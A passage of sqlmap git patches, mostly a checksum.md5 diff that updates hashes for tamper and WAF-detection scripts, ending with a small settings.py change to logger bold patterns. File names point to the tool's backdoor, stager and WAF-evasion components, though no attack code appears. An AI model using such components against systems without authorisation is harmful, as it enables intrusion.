+fb6be55d21a70765e35549af2484f762 lib/techniques/__init__.py +fb6be55d21a70765e35549af2484f762 lib/techniques/union/__init__.py +baa3946c23749d898f473dba0f4eecff lib/techniques/union/test.py +d32988e13713417286ab83a00856858e lib/techniques/union/use.py +bf5e2a2b265c0d8b9f054c94fb74dcb9 lib/utils/api.py +544dee96e782560fe4355cbf6ee19b8c lib/utils/brute.py +ac0780394af107b9a516463efc4de2e5 lib/utils/crawler.py +da4bc159e6920f1f7e45c92c39941690 lib/utils/deps.py +f7c64515a3e4fcfe8266ca2be77be565 lib/utils/getch.py +0d497906b06eb82d14da676e9f9c98f5 lib/utils/har.py 
+1fc47aa8860f809d103048e4eb51cdd2 lib/utils/hashdb.py +e571f559826c08f05d060625b4e9dcdd lib/utils/hash.py +17009289bb5c0dc0cceaa483113101e1 lib/utils/htmlentities.py +fb6be55d21a70765e35549af2484f762 lib/utils/__init__.py +2a40a6bd1779f7db5199f089411b1c1c lib/utils/pivotdumptable.py +5a8902fd6fa94ea73cf44952f9ed5a57 lib/utils/progress.py +a41136344768902f82b2855e88fd228d lib/utils/purge.py +b6e16ad8ea04e2c1ed65966fda1c66ac lib/utils/search.py +8d6b244ca3d6f99a9d6cd8c1856ccfeb lib/utils/sqlalchemy.py +a90c568a9b88eaea832a77581bd39d85 lib/utils/timeout.py +164f830baad3e13b226ee57d44d69dfa lib/utils/versioncheck.py +1e5d24f1c629476bdf43363d2c8d8397 lib/utils/xrange.py +ab877805fe12bbcbb06b9eccfabdc4ed plugins/dbms/access/connector.py +b0e4f4aed8504f97d4044620d3a7d27d plugins/dbms/access/enumeration.py +58d664d680087596965f95b482157320 plugins/dbms/access/filesystem.py +50e2991ae3f0a1eaf49fd10dcd041d92 plugins/dbms/access/fingerprint.py +bd8faded88ef80cde33b747d8181192d plugins/dbms/access/__init__.py +f36a8b05ea1a25254e03dc3bd44b1261 plugins/dbms/access/syntax.py +1a4e639d2a946792401cf5367ef661a5 plugins/dbms/access/takeover.py +b4bf4ef5189705945ca77424a7f42ee7 plugins/dbms/db2/connector.py +0f2e682ced8f91b1ec8bdf08c925b5a4 plugins/dbms/db2/enumeration.py +1ac13df2e0f04f312f522e9d8c13b692 plugins/dbms/db2/filesystem.py +e003fe19474305af522d8d6c6680db17 plugins/dbms/db2/fingerprint.py +f2fb5a3763f69cde1b1d520f8bd6a17a plugins/dbms/db2/__init__.py +61b06dce1b9a0a2f9962266a9c9495a5 plugins/dbms/db2/syntax.py +fcbd61e7ac30eb4c8f09ffd341fa27bb plugins/dbms/db2/takeover.py +e2d7c937e875e9d6f5e2c5612120b515 plugins/dbms/firebird/connector.py +f43ca05279e8fce4f02e4948d4af8fda plugins/dbms/firebird/enumeration.py +15a3a49824324c4cca444e6e63f84273 plugins/dbms/firebird/filesystem.py +6b505575b98694fd8e6a19870305db18 plugins/dbms/firebird/fingerprint.py +be722d08b76ed73da11af7a35ddf035d plugins/dbms/firebird/__init__.py +82db6676645cc6c3cabad0b346ef92f9 
plugins/dbms/firebird/syntax.py +ebf3557dd97204bf1431f0f8fca3b7d6 plugins/dbms/firebird/takeover.py +573380d437402bf886cef1b076a48799 plugins/dbms/h2/connector.py +695f3c809f2af91cc1719e8b9bd9a7e7 plugins/dbms/h2/enumeration.py +add850d6aa96a3a4354aa07d2f2395e7 plugins/dbms/h2/filesystem.py +eb7adf57e6e6cdb058435f4fa017e985 plugins/dbms/h2/fingerprint.py +4d838e712aaee541eb07278a3f4a2d70 plugins/dbms/h2/__init__.py +5a1e5c46053ec1be5f536cec644949b5 plugins/dbms/h2/syntax.py +5afbe4ae5ab3fe5176b75ac3c5a16fae plugins/dbms/h2/takeover.py +4bdbb0059d22e6a22fe2542f120d4b0b plugins/dbms/hsqldb/connector.py +cfc9923fe399f1735fb2befd81ff12be plugins/dbms/hsqldb/enumeration.py +e4366df5a32c32f33be348e880714999 plugins/dbms/hsqldb/filesystem.py +5d5c38e0961c5a4dade43da7149f2a28 plugins/dbms/hsqldb/fingerprint.py +5221fe018709e60663cae7c5d784ad60 plugins/dbms/hsqldb/__init__.py +5a1e5c46053ec1be5f536cec644949b5 plugins/dbms/hsqldb/syntax.py +e77d9be343fe7820a594d7b02f8d0b55 plugins/dbms/hsqldb/takeover.py +e7293692829fbacb63cd9f353b719ea8 plugins/dbms/informix/connector.py +4af6786b459ddbb666c5c765bf2a1158 plugins/dbms/informix/enumeration.py +1ac13df2e0f04f312f522e9d8c13b692 plugins/dbms/informix/filesystem.py +ed2bdb4eb574066521e88241a21f4bf7 plugins/dbms/informix/fingerprint.py +3ae2c32b58939dce2f934b9f79331798 plugins/dbms/informix/__init__.py +15b01ef55db3f3f1e77ad8cf77d0c27a plugins/dbms/informix/syntax.py +fcbd61e7ac30eb4c8f09ffd341fa27bb plugins/dbms/informix/takeover.py +fb6be55d21a70765e35549af2484f762 plugins/dbms/__init__.py +ad0b369b6b81a427abede09784db91c5 plugins/dbms/maxdb/connector.py +ea186b97a394b61d82ecf7ed22b0cff6 plugins/dbms/maxdb/enumeration.py +7886148c3d6114d43aa1d78b0512fe12 plugins/dbms/maxdb/filesystem.py +691c86dc54cf3cc69b0f5a5ea5fe9a3c plugins/dbms/maxdb/fingerprint.py +8ad820fdfd2454363279eda7a9a08e6e plugins/dbms/maxdb/__init__.py +8fe248263926639acf41db3179db13d0 plugins/dbms/maxdb/syntax.py +479ce664674859d0e61c5221f9e835fd 
plugins/dbms/maxdb/takeover.py +ac7f2849d59829c3a1e67c76841071fd plugins/dbms/mssqlserver/connector.py +69bfc53a409e79511802f668439bf4be plugins/dbms/mssqlserver/enumeration.py +bb02bdf47c71ed93d28d20b98ea0f8c6 plugins/dbms/mssqlserver/filesystem.py +bcabbf98e72bf3c6e971b56d8da60261 plugins/dbms/mssqlserver/fingerprint.py +6bffd484ef47111dd8a6e46e127ab5c7 plugins/dbms/mssqlserver/__init__.py +fae49b96d1422171b8f8c79f42aa56c9 plugins/dbms/mssqlserver/syntax.py +a5aa91bd7248d4f7ad508cf69f45696d plugins/dbms/mssqlserver/takeover.py +078a5399bd14d1416e2ae6fcd0445159 plugins/dbms/mysql/connector.py +a94bde2f4dcf3a5f166302d07ea32907 plugins/dbms/mysql/enumeration.py +81c762ceba0892d0d6d78d70f513d20a plugins/dbms/mysql/filesystem.py +fd79ec2504b6bada7d2da233a549af53 plugins/dbms/mysql/fingerprint.py +040835bde6be85ebc1a6667dcd08940e plugins/dbms/mysql/__init__.py +dd6bd1d3d561755b96e953ede16cb8fc plugins/dbms/mysql/syntax.py +6c91ef5b5a6cd29cef4bd9bc3c369454 plugins/dbms/mysql/takeover.py +fba38967a03e30a162660dd3685a46f2 plugins/dbms/oracle/connector.py +3266e81eb4a3c083d27c7a255be38893 plugins/dbms/oracle/enumeration.py +5bdd5288c8303ea21a5f8409332e32a1 plugins/dbms/oracle/filesystem.py +8813f44f3b67fc98024199c7b8398811 plugins/dbms/oracle/fingerprint.py +c7bb3f112aad2ea7ea92e036e9aab6a7 plugins/dbms/oracle/__init__.py +2676a1544b454f276c64f5147f03ce02 plugins/dbms/oracle/syntax.py +8da7c9ee0a0e692097757dfc2b5fefe0 plugins/dbms/oracle/takeover.py +e5e202429e9eee431c9dd39737b4b95c plugins/dbms/postgresql/connector.py +86f0e0c9c4bc155c93277e879e3c3311 plugins/dbms/postgresql/enumeration.py +d68b5a9d6e608f15fbe2c520613ece4a plugins/dbms/postgresql/filesystem.py +2af014c49f103cb27bc547cc12641e2b plugins/dbms/postgresql/fingerprint.py +fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py +290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py +339bc65824b5c946ec40a12cd0257df1 plugins/dbms/postgresql/takeover.py +d2391dfe74f053eb5f31b0efad3fdda0 
plugins/dbms/sqlite/connector.py +6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py +3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py +4d00b64bbfb2572a4a3a3330f255cc54 plugins/dbms/sqlite/fingerprint.py +582165c3e31ec5bf919db015c2e9bb2b plugins/dbms/sqlite/__init__.py +1ca5b1d7c64686827e80988933c397fa plugins/dbms/sqlite/syntax.py +224835bf71e99bac6e50b689afac5122 plugins/dbms/sqlite/takeover.py +492e2ad85f1a3a0feb2f010cb6c84eb1 plugins/dbms/sybase/connector.py +37a4e529dfb6bf3387c22e66cd9966f7 plugins/dbms/sybase/enumeration.py +9f16fb52a70e5fb01876f1bc5f5ef532 plugins/dbms/sybase/filesystem.py +69c104c5a2ff3e2c88a41205bb96d812 plugins/dbms/sybase/fingerprint.py +2fae8e5d100fc9fb70769e483c29e8fb plugins/dbms/sybase/__init__.py +ec3f406591fc9472f5750bd40993e72e plugins/dbms/sybase/syntax.py +369476221b3059106410de05766227e0 plugins/dbms/sybase/takeover.py +147f6af265f6b5412bbd7aaebef95881 plugins/generic/connector.py +e492c91101cecd66c9f6a630eab85368 plugins/generic/custom.py +a3fd48c7094fca6692be8b1ae5e29cea plugins/generic/databases.py +6283b356e6055bb9071f00cdf66dea24 plugins/generic/entries.py +f3624debb8ae6fbcfb5f1b7f1d0743d1 plugins/generic/enumeration.py +cda119b7b0d1afeb60f912009cdb0cf5 plugins/generic/filesystem.py +65e75cd3c2c7acffa6ac13b086e0f383 plugins/generic/fingerprint.py +fb6be55d21a70765e35549af2484f762 plugins/generic/__init__.py +de1928d6865547764ae9a896da4bf1d4 plugins/generic/misc.py +8bc2b5dfbc4c644ed95adfe8099ee067 plugins/generic/search.py +1989f6cbed217f4222dc2dce72992d91 plugins/generic/syntax.py +d152384fffebfa010188707bf683cd3c plugins/generic/takeover.py +a4b9f764140e89279e3d0dace99bfa5f plugins/generic/users.py +fb6be55d21a70765e35549af2484f762 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ 595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_ 
@@ -233,65 +233,65 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ -cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -83d4d43cf6ce06635418ce75ae71eb90 sqlmap.py -523dab9e1093eb59264c6beb366b255a tamper/0x2char.py -3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py -d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py -a14420ef43cdeb8fbc091116d31d31f1 tamper/appendnullbyte.py -cfe19908ec32e3f2e113e759705f986b tamper/base64encode.py -e77a89b2af931a1820f6ba4b86d19cd4 tamper/between.py -9df0a1810a27b92eec1375d19a95b7ef tamper/bluecoat.py -8c174b8925f4f075010b04d85c02a169 tamper/chardoubleencode.py -45174c61533f464806f4454be6a3f2d6 tamper/charencode.py -0aadf3e93dd72a9b94cb6532b3343dd1 tamper/charunicodeencode.py -014f352771f0c1fb9e0f5397c5a03dc3 tamper/charunicodeescape.py -6c618b9310ed5c8de93c927e920b1d31 tamper/commalesslimit.py -50f6532870d2e109bf46468e8d3ded49 tamper/commalessmid.py -4951fec0a1af043e4b9c0728882d3452 tamper/commentbeforeparentheses.py -376dc1203bfcd88380d902d36e7e0c5a tamper/concat2concatws.py -6c882baf74213f401841968c04ce5e42 tamper/equaltolike.py -22ab48f5b8ca449ac651637016be4369 tamper/escapequotes.py -4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py -6124bc647bfa04f2b16ff8cad98382d4 tamper/halfversionedmorekeywords.py -ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py -42f232d776065e325e862867c522c523 tamper/ifnull2casewhenisnull.py -6e3ab1cf4ccf5524dcb60e390f920b60 tamper/ifnull2ifisnull.py -3ed2c6299c7c94776306535ff6090ab3 tamper/informationschemacomment.py -1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py -2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py -a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py -82b85a9325ffc22a9fe4003e12c5bc4a tamper/modsecurityversioned.py 
-0e0f17db797e61f778141a804ab6cd0d tamper/modsecurityzeroversioned.py -91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py -dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py -a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py -89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py -cec3be164c27df01f016f6b0e0981006 tamper/plus2concat.py -167ab896d300bcea811ee61a972950e1 tamper/plus2fnconcat.py -b9db4cc9fc4e0a586198340d1268fdaf tamper/randomcase.py -28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py -cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py -4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py -7cdbae483262f66ef5d77521c59d9621 tamper/space2hash.py -f3fed47a4fccb2b482f1f01559b8f55a tamper/space2morecomment.py -fc3d9896cac8f4a97efd39673fadca7b tamper/space2morehash.py -b55ed15af74ffefc4dc303646c7c6482 tamper/space2mssqlblank.py -64e3d97e22f7e0870e88a87fd2f64243 tamper/space2mssqlhash.py -3ef95855a38bbc0f031ae3a992dcbf52 tamper/space2mysqlblank.py -8a4737f853354ac9c3788278589a772a tamper/space2mysqldash.py -72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py -a74cd6375c5d5d253e2e7014b00ecd33 tamper/space2randomblank.py -93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py -690eb5200c9e61e54cd8952edaefda23 tamper/symboliclogical.py -6679c4ffb7322315a738dcfa68c6fb7c tamper/unionalltounion.py -0a7e97374019321ffc606d41535f26d6 tamper/unmagicquotes.py -cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py -f2b9eac52d346315f5705f71beeda791 tamper/varnish.py -0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py -0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -d8279aa1633e2485ed751eb0361d1c8e tamper/xforwardedfor.py +41522f8ad02ac133ca0aeaab374c36a8 sqlmapapi.py +67607879bc78f039b9c9f3be6380d253 sqlmap.py +772fb3dd15edc9d4055ab9f9dee0c203 tamper/0x2char.py +3d89a5c4c33d4d1d9303f5e3bd11f0ae tamper/apostrophemask.py +1fd0eec63970728c1e6628b2e4c21d81 tamper/apostrophenullencode.py 
+b1d9fb70a972565f54655f428c3ac329 tamper/appendnullbyte.py +a48ddba5854c0f8c7cac78034ab8cbfa tamper/base64encode.py +ead9e7a87360ddd13bf1de2d6b36b491 tamper/between.py +01cc36d46038c9480366cac98898fe39 tamper/bluecoat.py +ba5ebde73da33956fe911e11f025e645 tamper/chardoubleencode.py +2e3e97cfad12090b9bd1c74b69679422 tamper/charencode.py +6ac8f2b28d5686b38c9f282ee18d0d39 tamper/charunicodeencode.py +dfb7f2eac76f63a73d0d7f40d67b0ff0 tamper/charunicodeescape.py +d56dd22ef861d4fc15fb5eb6bd026ff0 tamper/commalesslimit.py +6795b3d686297cd30c6c187b49b88446 tamper/commalessmid.py +098941e3b27eb4175287f28a00f1ef4c tamper/commentbeforeparentheses.py +a26a9bb4bd911aab7d84504cfa1ebdba tamper/concat2concatws.py +7ca2e1b08858a131ba58d3c669241c95 tamper/equaltolike.py +9a7e8d28ec31c1f9076c9dc1af9cbe04 tamper/escapequotes.py +6c7e8474ab7c5c2e07c4601b69a62fc1 tamper/greatest.py +c1709d45874eace00c0679d482829974 tamper/halfversionedmorekeywords.py +20b0c7c888cdb11e00100dcc3226d685 tamper/htmlencode.py +1a81558b83b218445039911f26475e86 tamper/ifnull2casewhenisnull.py +ed1dcf9292a949b43a2d32b0c0fc2072 tamper/ifnull2ifisnull.py +7dbaaf62b80b29cf807806e515488ce1 tamper/informationschemacomment.py +fb6be55d21a70765e35549af2484f762 tamper/__init__.py +5c4ac7c3f8d4724737a4307eb3bead20 tamper/least.py +80d9bd948c353fed81dc7b06840acbaa tamper/lowercase.py +ee5fd7d806531737987d5d518be2e9a9 tamper/luanginx.py +b50ecb14fc88963bd20d1433e8c27fcd tamper/modsecurityversioned.py +26ed48a6f984cbcd94f99895b2bc6da2 tamper/modsecurityzeroversioned.py +b4099f36131eabf64f9ae287a67f79c4 tamper/multiplespaces.py +2c3d05be881074e5bf72cece194b2011 tamper/overlongutf8more.py +d0a25188761286f7d464e9d166d22930 tamper/overlongutf8.py +97a8378552cd4cd73c42c575228b6ab0 tamper/percentage.py +6984dda440f06fc1887b4087760bda34 tamper/plus2concat.py +60c97825e2dbd40562c01ab65f25948f tamper/plus2fnconcat.py +277726cc91a5f57dbcae037c9986ef0c tamper/randomcase.py +a88b92c7288aafe04926c49541c0dc38 tamper/randomcomments.py 
+b70566435b25f0995a651adaf5d26c0d tamper/space2comment.py +3ef82de711f7d9e89f014c48851508f1 tamper/space2dash.py +d46a0acbb24d33704763191fd867ca78 tamper/space2hash.py +703686f68988c9087b6dcef23cb40a03 tamper/space2morecomment.py +dda73a08c44850c097a888128102edd5 tamper/space2morehash.py +b4c550d42994001422073ccb2afc37a4 tamper/space2mssqlblank.py +d38f95ea746038856fa02aab16064d83 tamper/space2mssqlhash.py +a308787c9dad835cb21498defcd218e6 tamper/space2mysqlblank.py +75eef8086f8f6edf9d464277c9f1c1f5 tamper/space2mysqldash.py +dc99c639a9bdef91a4225d884c29bb40 tamper/space2plus.py +190bc9adca68e4a628298b78e8e455e8 tamper/space2randomblank.py +eec5c82c86f5108f9e08fb4207a8a9b1 tamper/sp_password.py +64b9486995d38c99786f7ceefa22fbce tamper/symboliclogical.py +08f2ce540ee1f73b6a211bffde18e697 tamper/unionalltounion.py +628f74fc6049dd1450c832cabb28e0da tamper/unmagicquotes.py +f9f4e7316898109c3d5f3653cf162e12 tamper/uppercase.py +91b99614063348c67ce7ce5286a76392 tamper/varnish.py +db49128b094326fd87a6a998c27a5514 tamper/versionedkeywords.py +fc571c746951a5306591e04f70ddc46e tamper/versionedmorekeywords.py +d39ce1f99e268dc7f92b602656f49461 tamper/xforwardedfor.py b1c02296b4e3b0ebaa58b9dcd914cbf4 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py 
@@ -396,78 +396,78 @@ a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqlud d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -336d0b0d2be333f5a6184042c85464fd waf/360.py -9bf2e07cdc54a661aea056223caccfb6 waf/aesecure.py -a73a40d201b39f3387714c59934331e4 waf/airlock.py -7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py -e33e11d4a8a91ade0561bb65d4d33bc6 waf/approach.py -b61329e8f8bdbf5625f9520ec010af1f waf/armor.py -2fe5335fde7a7f5b19d2f363a55ce805 waf/asm.py -6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py -ef722d062564def381b1f96f5faadee3 waf/baidu.py -07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py -44f724ab7d333397975fecdf7e50be56 waf/bigip.py -6a2834daf767491d3331bd31e946d540 waf/binarysec.py -41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py -6d505434a13365cbe3b01f912ea36a44 waf/bluedon.py -c52c6974c0dae6815f27cfdee6121d7b waf/chinacache.py -2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -a1d16d7106c9c66072aa58530c288515 waf/cloudflare.py -a8affab0838c6a1fe683d5b7333d7a69 waf/cloudfront.py -ac96f34c254951d301973617064eb1b5 waf/comodo.py -c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py -56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py -1538b661e35843074f4599be93b3fae9 waf/denyall.py -67256152eef36a85498b49a1f0e4e328 waf/distil.py -aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py -9760a22990f55ab51ea4eedabd939055 waf/dotdefender.py -7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py -954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py -a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py -ade1299c435db7b9e35cf1166ed9d859 waf/generic.py -1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -0359ca07b6e3ee0e4505ad5bfaa1de79 waf/incapsula.py 
-1e5532ede194ac9c083891c2f02bca93 waf/__init__.py -30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py -5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py -898f53c12133da3e946301f4aa97d538 waf/knownsec.py -15a50edd48961ea168648a370f42e123 waf/kona.py -69cadf95303d60ac0a228cf60dfdba73 waf/modsecurity.py -d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py -bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py -cb2f1516867684042f580e02138463de waf/netscaler.py -63b3cc819f432a32a403e24a00ab4d23 waf/newdefend.py -a925b2979c8e8aafb9e9a338ba4da6cf waf/nsfocus.py -ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py -856e34d47fedfe96039a6a7807f9605a waf/profense.py -166eb53544536e3e86223d513b8b688d waf/proventia.py -78a40eca7ddd14c4eaf911de7748b487 waf/radware.py -67864bf5e5a38cb27b5daf3581282f9e waf/reblaze.py -f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py -acb82b21f4032ceb510a58142add02ab waf/safe3.py -67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py -d1b67820442199181815ec3fce27e582 waf/secureiis.py -34f0ec775835744bed601ef7c7a21c9d waf/senginx.py -1508a5200534b5273b66cecfd299e53e waf/sitelock.py -b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py -4c412bc70007e6108d109e2911f2cefe waf/sophos.py -0e244e097a648158948dc8bb2351c781 waf/stingray.py -9da254a2dfe22539c90bc1db0643489e waf/sucuri.py -46224e3fa4b819da227c50fd45155823 waf/tencent.py -dffa9cebad777308714aaf83b71635b4 waf/teros.py -b37210459a13de40bf07722c4d032c33 waf/trafficshield.py -fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py -a687449cd4e45f69e33b13d41e021480 waf/uspses.py -2d2740972d887d099e9cc8f132a8f147 waf/varnish.py -20840afc269920826deac2b6c00d6b9c waf/wallarm.py -11205abf397ae9072adc3234b656ade9 waf/watchguard.py -9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py -6802052ddae241e2f4f78974ed11904a waf/webknight.py -11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py -68e332530fab216d017ede506c3fec2f waf/yundun.py -bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py -47f8f6623841232a93c5229d6c1bebfe 
waf/zenedge.py +129c2436cf3e0dd9ba0429b2f45a0113 waf/360.py +2d63c46bed78aec2966a363d5db800fd waf/aesecure.py +2add09865acdb6edc40d326446ac6e40 waf/airlock.py +94eec6c5d02357596292d36a8533f08f waf/anquanbao.py +7ab1a7cd51a02899592f4f755d36a02e waf/approach.py +425f2599f57ab81b4fff67e6b442cccc waf/armor.py +fac23fc2e564edaf90a4346f3ee525b0 waf/asm.py +9dbec5d674ed4c762ffc9bc3ab402739 waf/aws.py +29b14801171574a3d92a30542a32be54 waf/baidu.py +4fd9a8e3aac364fe5509b23e7eb5a448 waf/barracuda.py +2bb132ecea25e947e7e82e32e7dd6b3a waf/bigip.py +742f8c9b7f3a858e11dfd2ce3df65c6e waf/binarysec.py +ef8c5db49ad9973b59d6b9b65b001714 waf/blockdos.py +2608fbe2c80fae99bb09db1f93d80cdd waf/bluedon.py +5ae64cad95b7f904c350cc81230c3bd1 waf/chinacache.py +a05edf8f2962dfff0457b7a4fd5e169c waf/ciscoacexml.py +af079de99a8ec6988d28aa4c0aa32cf9 waf/cloudbric.py +8fec83056c8728076ab17ab3a2ebbe7b waf/cloudflare.py +5672c1ae038dcfc523a6d82d9875025c waf/cloudfront.py +847ee97f6e0f8aeec61afd3e0c91543b waf/comodo.py +f7571543ccb671a63a8139e375d6a4f2 waf/crawlprotect.py +f20b14ca9f7c2442fd1e9432d933a75b waf/datapower.py +e49bb75985f60556b4481dc085f3c62b waf/denyall.py +dbe50bbcb1b4664d6cebfcca63e75125 waf/distil.py +2e8bf326975edcb4d627493c46c6807c waf/dosarrest.py +886c6502a6a2aae49921efed8d439f7b waf/dotdefender.py +a8412619d7f26ed6bc9e0b20a57b2324 waf/edgecast.py +17e7ac56629b25a9ea8cfe01c3604745 waf/expressionengine.py +588d2f9a8f201e120e74e508564cb487 waf/fortiweb.py +0e9eb20967d2dde941cca8c663a63e1f waf/generic.py +2aa7775dac8df4a3cdb736fdf51dc9cb waf/hyperguard.py +1adbd0c470d1bbcec370722f05094255 waf/incapsula.py +fb6be55d21a70765e35549af2484f762 waf/__init__.py +a3ee375714987acccc26d1b07c2e8af7 waf/isaserver.py +ce9cf35919a92d65347bb74ca0c5c86f waf/jiasule.py +f44ed04eeb4287c11ce277703ec7d72d waf/knownsec.py +d50d82bec48814eb5b699d302dbdae9a waf/kona.py +10b1c6891494b780d1966e47fca2b58a waf/modsecurity.py +78af8e791207db9723a14bddeb7524af waf/naxsi.py +504ade4d32bdbbd2932eebb07f57c3eb 
waf/netcontinuum.py +47ef4146cac17e3244bbc1a93fb51942 waf/netscaler.py +84e9c68b6ecffafb5ec8cd96acaf62b9 waf/newdefend.py +69fc40e85751279e9018d643742db04e waf/nsfocus.py +7ff3c93f2c77a984ebbf217c7c38a796 waf/paloalto.py +2979bb64c24256a83625d75a385dde9b waf/profense.py +8de0d46738335a4e498c4ac9038ac3c3 waf/proventia.py +ac60456fe7af4eb501d448910e98ee4b waf/radware.py +dba6a3b52851d2d7a0a1ab83a51caa5a waf/reblaze.py +987389e4f403b7615d6d8006420a6260 waf/requestvalidationmode.py +2a7b234e903d13b3c21d6c17e05d1c46 waf/safe3.py +4382cb217354d816580ee07178d0a8c7 waf/safedog.py +ac0728ddb7a15b46b0eabd78cd661f8c waf/secureiis.py +ba37e1c37fa0e3688873f74183a9cb9c waf/senginx.py +4d79866c7cff0d7650a22d0a85126c05 waf/sitelock.py +a840fcd2bb042694f9aab2859e7c9b30 waf/sonicwall.py +45683bfe7a428f47745416c727a789bd waf/sophos.py +a0aa5997d0d5db18920840220dc4ad36 waf/stingray.py +74bd52941b606d15f1a6cdc7b52f761c waf/sucuri.py +205beb7ed5e70119f8700a9e295b6a4a waf/tencent.py +ef6f83952ce6b5a7bbb19f9b903af2b6 waf/teros.py +ba0fb1e6b815446b9d6f30950900fc80 waf/trafficshield.py +876c746d96193071271cb8b7e00e1422 waf/urlscan.py +45f28286ffd89200d4c9b6d88a7a518f waf/uspses.py +2d9d9fa8359a9f721e4b977d3da52410 waf/varnish.py +67df54343a85fe053226e2a5483b2c64 waf/wallarm.py +6aad5ef252bf428e9bbebe650c0cf67e waf/watchguard.py +c8dcaa89f6cde684a578fdc2e9ab2bb8 waf/webappsecure.py +a7b8c4c3d1463409e0e204932f0ddff0 waf/webknight.py +16e421475ff62b203298e669edca7b40 waf/wordfence.py +e16122cb40e5f3a66cba359cfb672bd2 waf/yundun.py +a560bee3e948b97af2c88805933dcaad waf/yunsuo.py +c8b6517da2c8a28d474956e3a6b8c1ed waf/zenedge.py e68f399aeaa5b516f043af88dd4871a0 xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml From e3134cc96514ad4647cdb9a2e9f5091bb2d69199 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sat, 5 Jan 2019 23:14:28 +0100 Subject: [PATCH 428/428] Final preparation for 1.3 --- lib/core/settings.py | 2 +- lib/core/testing.py | 72 +++++++++++++++++++++++--------------------- txt/checksum.md5 | 4 +-- 3 files changed, 41 insertions(+), 37 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index a25b3b6a72c..505c72a8f48 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -675,7 +675,7 @@ CHECK_ZERO_COLUMNS_THRESHOLD = 10
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported")
+BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED")
 # Generic www root directory names
